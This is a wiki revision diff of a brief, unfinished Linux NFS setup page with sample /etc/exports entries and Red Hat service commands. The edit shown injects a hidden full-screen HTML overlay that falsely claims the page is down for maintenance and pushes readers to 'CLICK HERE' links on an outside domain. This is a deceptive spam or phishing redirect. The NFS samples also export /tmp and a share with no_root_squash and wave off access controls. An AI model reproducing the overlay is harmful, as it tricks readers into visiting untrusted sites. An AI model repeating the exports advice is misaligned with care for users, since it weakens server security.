Difference between revisions of "NFS"
From Free Knowledge Base- The DUCK Project: information for everyone
(New page: On the server: 3 configuration files. /etc/exports, /etc/hosts.allow, and /etc/hosts.deny sample exports file entries: /home/share 192.168.1.0/255.255.255.0(rw,no_root_squ...) |
Atekysepiko (Talk | contribs) |
||
Line 1: | Line 1: | ||
− | On the server: 3 configuration files. | + | >On the server: 3 configuration files. |
/etc/exports, /etc/hosts.allow, and /etc/hosts.deny | /etc/exports, /etc/hosts.allow, and /etc/hosts.deny | ||
Line 24: | Line 24: | ||
[[Category:Computer_Technology]] | [[Category:Computer_Technology]] | ||
[[Category:Linux]] | [[Category:Linux]] | ||
+ | |||
+ | ---- | ||
+ | <div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;"> | ||
+ | ---- | ||
+ | =[http://ocyxanebyla.co.cc Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page]= | ||
+ | ---- | ||
+ | =[http://ocyxanebyla.co.cc CLICK HERE]= | ||
+ | ---- | ||
+ | </div> |
Revision as of 00:12, 18 November 2010
>On the server: 3 configuration files.
/etc/exports, /etc/hosts.allow, and /etc/hosts.deny
sample exports file entries:
/home/share 192.168.1.0/255.255.255.0(rw,no_root_squash) /home/username 192.168.1.0/255.255.255.0(rw,root_squash) /tmp 192.168.1.0/255.255.255.0(rw,no_root_squash)
For hosts.allow and hosts.deny you can leave them empty if you wish to disregard security. Configuration of those two files is not covered here. See 'man hosts.allow'
Five daemons: rpc.nfsd, rpc.lockd, rpc.statd, rpc.mountd, rpc.rquotad
redhat manual start type:
service portmap start service nfs start service nfslock start
netfs?
On the client: